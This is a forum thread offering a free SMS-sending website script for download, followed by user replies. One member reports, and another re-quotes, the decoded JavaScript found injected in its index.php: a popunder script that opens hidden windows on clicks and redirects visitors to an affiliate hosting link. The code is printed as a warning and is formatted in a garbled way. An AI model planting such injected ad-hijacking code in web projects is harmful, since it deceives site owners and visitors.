54.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-16-2014, 04:18 AM
Post: #1
[GET] Free SMS sending Script
[Image: rQS0a7s.png] Now Create your own Free SMS sending website. You can send text messages (SMS) to almost every country in the world. The script works for FREE, you do not pay to send any of the text messages. Really attractive web 2.0 interface.
Unlike other scripts, the owner can receive all the text messages to their email address to make sure no one is abusing the system.
Download Link
http://www77.zippyshare.com/v/10979582/file.html

Virus Total Link: https://www.virustotal.com/en/file/accc2...416075344/
0/55[font=Arial, Helvetica, sans-serif]++Rep Please[/font] Smile
11-16-2014, 04:47 AM
Post: #2
RE:
Do we need any SMS gateway to work this script? or it will send sms without sms gateway?
What's the sales page of this script?
11-16-2014, 05:40 AM
Post: #3
RE:
It does not work
11-16-2014, 05:58 AM
Post: #4
RE:
yup not working
11-16-2014, 06:17 AM
Post: #5
RE:
any sms gatway ?
81.gif
11-16-2014, 01:28 PM (This post was last modified: 11-16-2014 01:30 PM by Prince_Boss.)
Post: #6
RE:
(11-16-2014 04:47 AM)nilshinde Wrote:  Do we need any SMS gateway to work this script? or it will send sms without sms gateway?
What's the sales page of this script?
As far as I know it comes with all the Gateways

Sales Page
http://www.websitescripts.org/website-sc...rod_6.html
11-16-2014, 04:47 PM
Post: #7
RE:
Script has a malicious code inserted in index.php ,

decoded is something like this, code is placing popunders on mouse clicks and lead to affiliate link for hosting company

PHP Code:
<!

document
.write(
<
script>

var 
puShown false;

var 
PopWidth 1370;

var 
PopHeight 800;

var 
PopFocus 0;

var 
_Top null;
function 
GetWindowHeight() {

var 
myHeight 0;

if( 
typeof_Top.window.innerHeight ) == ‘number’ ) {

myHeight _Top.window.innerHeight;

} else if( 
_Top.document.documentElement and& _Top.document.documentElement.clientHeight ) {

myHeight _Top.document.documentElement.clientHeight;

} else if( 
_Top.document.body and& _Top.document.body.clientHeight ) {

myHeight _Top.document.body.clientHeight;

}

return 
myHeight;

}
function 
GetWindowWidth() {

var 
myWidth 0;

if( 
typeof_Top.window.innerWidth ) == ‘number’ ) {

myWidth _Top.window.innerWidth;

} else if( 
_Top.document.documentElement and& _Top.document.documentElement.clientWidth ) {

myWidth _Top.document.documentElement.clientWidth;

} else if( 
_Top.document.body and& _Top.document.body.clientWidth ) {

myWidth _Top.document.body.clientWidth;

}

return 
myWidth;

}
function 
GetWindowTop() {

return (
_Top.window.screenTop != undefined) ? _Top.window.screenTop _Top.window.screenY;

}
function 
GetWindowLeft() {

return (
_Top.window.screenLeft != undefined) ? _Top.window.screenLeft _Top.window.screenX;

}
function 
doOpen(url)

{

var 
popURL “about:blank”

var popID “ad_” Math.floor(89999999*Math.random()+10000000);

var 
pxLeft 0;

var 
pxTop 0;

pxLeft = (GetWindowLeft() + (GetWindowWidth() / 2– (PopWidth 2));

pxTop = (GetWindowTop() + (GetWindowHeight() / 2– (PopHeight 2));
if ( 
puShown == true )

{

return 
true;

}
var 
PopWin=_Top.window.open(popURL,popID,’toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=
 
pxTop ,left=’ pxLeft ,width=’ PopWidth ,height=’ 
PopHeight);
if (
PopWin)

{

puShown true;
if (
PopFocus == 0)

{

PopWin.blur();
if (
navigator.userAgent.toLowerCase().indexOf(“applewebkit”) > -1)

{

_Top.window.blur();

_Top.window.focus();

}

}
PopWin.Init = function(e) {
with (e) {
Params e.Params;

Main = function(){
if (
typeof window.mozPaintCount != “undefined”) {

var 
window.open(“about:blank”);

x.close();
}
var 
popURL Params.PopURL;
try { 
opener.window.focus(); }

catch (
err) { }
window.location popURL;

}
Main();

}

};
PopWin.Params = {

PopURLurl

}
PopWin.Init(PopWin);

}
return 
PopWin;

}
function 
setCookie(namevaluetime)

{

var 
expires = new Date();
expires.setTimeexpires.getTime() + time );
document.cookie name =’ value path=/;’ expires=’ expires.toGMTString() ;

}
function 
getCookie(name) {

var 
cookies document.cookie.toString().split();

var 
cookiec_namec_value;
for (var 
n=0n<cookies.lengthn++) {

cookie cookies[n].split(=);

c_name cookie[0];

c_value cookie[1];
if ( 
c_name == name ) {

return 
c_value;

}

}
return 
null;

}
function 
initPu()

{
_Top self;
if (
top != self)

{

try

{

if (
top.document.location.toString())

_Top top;

}

catch(
err) { }

}
if ( 
document.attachEvent )

{

document.attachEvent‘onclick’checkTarget );

}

else if ( 
document.addEventListener )

{

document.addEventListener‘click’checkTargetfalse );

}

}
function 
checkTarget(e)

{

if ( !
getCookie(‘popundr’) ) {

var 
|| window.event;

var 
win doOpen(‘http://>>>[[[Reported by Members as URL Shortener! Post the actual link!]]]<<</1n1host’);

setCookie(‘popundr’124*60*60*1000);

}

}
initPu();

</
script>
);

//–> 

quick check on link (add + sign to bitly link to see statistics) show over 18.306 clicks since february 2010]]<<</ZNMl8+]]]<<</ZNMl8+]
PHP Code:
http://>>>[[[Reported by Members as URL Shortener! Post the actual link!]]]<<</1n1host+ 

In other words - do not trust to those online scans and install shyte on your servers, at least check the code manually before upload.
11-17-2014, 04:10 AM
Post: #8
RE:
(11-16-2014 04:47 PM)azure293 Wrote:  Script has a malicious code inserted in index.php ,

decoded is something like this, code is placing popunders on mouse clicks and lead to affiliate link for hosting company

PHP Code:
<!

document
.write(
<
script>

var 
puShown false;

var 
PopWidth 1370;

var 
PopHeight 800;

var 
PopFocus 0;

var 
_Top null;
function 
GetWindowHeight() {

var 
myHeight 0;

if( 
typeof_Top.window.innerHeight ) == ‘number’ ) {

myHeight _Top.window.innerHeight;

} else if( 
_Top.document.documentElement and& _Top.document.documentElement.clientHeight ) {

myHeight _Top.document.documentElement.clientHeight;

} else if( 
_Top.document.body and& _Top.document.body.clientHeight ) {

myHeight _Top.document.body.clientHeight;

}

return 
myHeight;

}
function 
GetWindowWidth() {

var 
myWidth 0;

if( 
typeof_Top.window.innerWidth ) == ‘number’ ) {

myWidth _Top.window.innerWidth;

} else if( 
_Top.document.documentElement and& _Top.document.documentElement.clientWidth ) {

myWidth _Top.document.documentElement.clientWidth;

} else if( 
_Top.document.body and& _Top.document.body.clientWidth ) {

myWidth _Top.document.body.clientWidth;

}

return 
myWidth;

}
function 
GetWindowTop() {

return (
_Top.window.screenTop != undefined) ? _Top.window.screenTop _Top.window.screenY;

}
function 
GetWindowLeft() {

return (
_Top.window.screenLeft != undefined) ? _Top.window.screenLeft _Top.window.screenX;

}
function 
doOpen(url)

{

var 
popURL “about:blank”

var popID “ad_” Math.floor(89999999*Math.random()+10000000);

var 
pxLeft 0;

var 
pxTop 0;

pxLeft = (GetWindowLeft() + (GetWindowWidth() / 2– (PopWidth 2));

pxTop = (GetWindowTop() + (GetWindowHeight() / 2– (PopHeight 2));
if ( 
puShown == true )

{

return 
true;

}
var 
PopWin=_Top.window.open(popURL,popID,’toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=
 
pxTop ,left=’ pxLeft ,width=’ PopWidth ,height=’ 
PopHeight);
if (
PopWin)

{

puShown true;
if (
PopFocus == 0)

{

PopWin.blur();
if (
navigator.userAgent.toLowerCase().indexOf(“applewebkit”) > -1)

{

_Top.window.blur();

_Top.window.focus();

}

}
PopWin.Init = function(e) {
with (e) {
Params e.Params;

Main = function(){
if (
typeof window.mozPaintCount != “undefined”) {

var 
window.open(“about:blank”);

x.close();
}
var 
popURL Params.PopURL;
try { 
opener.window.focus(); }

catch (
err) { }
window.location popURL;

}
Main();

}

};
PopWin.Params = {

PopURLurl

}
PopWin.Init(PopWin);

}
return 
PopWin;

}
function 
setCookie(namevaluetime)

{

var 
expires = new Date();
expires.setTimeexpires.getTime() + time );
document.cookie name =’ value path=/;’ expires=’ expires.toGMTString() ;

}
function 
getCookie(name) {

var 
cookies document.cookie.toString().split();

var 
cookiec_namec_value;
for (var 
n=0n<cookies.lengthn++) {

cookie cookies[n].split(=);

c_name cookie[0];

c_value cookie[1];
if ( 
c_name == name ) {

return 
c_value;

}

}
return 
null;

}
function 
initPu()

{
_Top self;
if (
top != self)

{

try

{

if (
top.document.location.toString())

_Top top;

}

catch(
err) { }

}
if ( 
document.attachEvent )

{

document.attachEvent‘onclick’checkTarget );

}

else if ( 
document.addEventListener )

{

document.addEventListener‘click’checkTargetfalse );

}

}
function 
checkTarget(e)

{

if ( !
getCookie(‘popundr’) ) {

var 
|| window.event;

var 
win doOpen(‘http://*marked as SPAM*/1n1host’);

setCookie(‘popundr’124*60*60*1000);

}

}
initPu();

</
script>
);

//–> 

quick check on link (add + sign to bitly link to see statistics) show over 18.306 clicks since february 2010http://*marked as SPAM*/ZNMl8+http://*marked as SPAM*/ZNMl8+
PHP Code:
http://*marked as SPAM*/1n1host+ 

In other words - do not trust to those online scans and install shyte on your servers, at least check the code manually before upload.
Not my fault got this script from Scriptux
Link here: http://www.>>>[[[Reported by Members as self-promotion. Please post the actual direct link!]]]<<</free-sms-sending-script/
11-17-2014, 06:21 AM
Post: #9
RE:
Original LINK - http://www50.zippyshare.com/v/96927554/file.html
11-17-2014, 06:31 AM
Post: #10
RE:
(11-17-2014 06:21 AM)gigihack Wrote:  Original LINK - http://www50.zippyshare.com/v/96927554/file.html
It's the exact same file, except I just renamed the name Scriptuxx
69.gif




87.gif
Free counters!